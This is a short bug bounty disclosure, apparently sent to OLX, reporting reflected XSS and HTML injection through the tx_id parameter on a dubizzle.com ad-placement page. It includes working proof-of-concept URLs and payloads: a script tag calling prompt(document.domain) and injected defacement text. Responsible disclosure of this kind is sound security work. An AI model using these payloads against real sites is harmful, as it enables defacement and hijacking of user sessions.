XSS and HTML Injection https://sharjah.dubizzle.com/

Hi,Olx Firstly.I saw that dubizzle.com is in your scope so I've decided to report it. PoC: --------------------- 1-Go to that link 2-Login to your dubizzle account,XSS will execute https://sharjah.dubizzle.com/place-an-ad/motors/used-cars/bmw/x5/new/?tx_id=9003650_53c48543e92c478cb165a53b39e48562%3C/script%3E%3Cscript%3Eprompt(document.domain)%3C/script%3E We can use it for HTML injection by the way like this : https://sharjah.dubizzle.com/place-an-ad/motors/used-cars/bmw/x5/new/?tx_id=9003650_53c48543e92c478cb165a53b39e48562%3C/script%3E%3Ch2%3EOUR%20SITE%20HAS%20BEEN%20DOWN%3C/h2%3E Vulnerable Parameter --------------------- ``` ?tx_id= ``` Payloads --------------------- ```</script><h2>OUR SITE HAS BEEN DOWN</h2> </script><script>prompt(document.domain)</script> </script><script>prompt(document.domain)</script>``` Testing --------------------- Tested and confirmed on Firefox's latest version If you have any questions,please let me know about it.Thanks !